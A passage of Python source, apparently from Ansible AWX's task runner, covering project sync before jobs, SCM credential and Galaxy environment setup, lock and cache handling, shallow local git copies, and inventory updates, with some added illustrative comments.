error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True  # to accommodate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that the local tree is
# up-to-date with the project and the job runs the project's current revision
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# run inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = str(True)
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
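# Illustrative example (hypothetical URL, not from the source): for a git project whose
# scm_url is https://user:secret@git.example.com/repo.git, the credentials embedded in
# the URL take precedence over the stored credential and remain in the rewritten URL, so
# no scm_username/scm_password extra vars are emitted; for an svn URL they are instead
# moved into extra_vars (and stripped from the URL) so they can be passed to the
# subversion module as module options.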
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning(f'Galaxy role/collection syncing is enabled, but no credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} seconds waiting to acquire lock for local source tree for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not kept in a git repo; it lives in a vendored
# playbooks directory. To stay consistent with the ansible-runner layout,
# it is copied into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
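# Rough git-CLI equivalent of the shallow-copy trick above (illustrative only; the
# project path and revision are hypothetical):
#
#   git -C /var/lib/awx/projects/_6__demo branch awx_internal/<uuid> abc123
#   git clone --depth 1 --single-branch -b awx_internal/<uuid> \
#       file:///var/lib/awx/projects/_6__demo /runner/project
#   git -C /var/lib/awx/projects/_6__demo branch -D awx_internal/<uuid>
#
# Submodules are cloned the same way, one at a time, from their local checkouts.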
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Copy the roles and collections folders to the durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can cause problems;
# restore the branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
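# Illustrative sketch (hypothetical paths and IDs): for an SCM source whose source_path
# is inventories/dev.ini and an inventory update with id 42, the argument list is roughly:
#
#   ['ansible-inventory', '--list', '--export',
#    '-i', '/runner/project/inventories/dev.ini',
#    '--output', '/runner/artifacts/42/output.json',
#    '--playbook-dir', '/runner/project/inventories', '-vvv']
#
# assuming CONTAINER_ROOT is /runner and verbosity 1 (which maps to -vvv).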
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
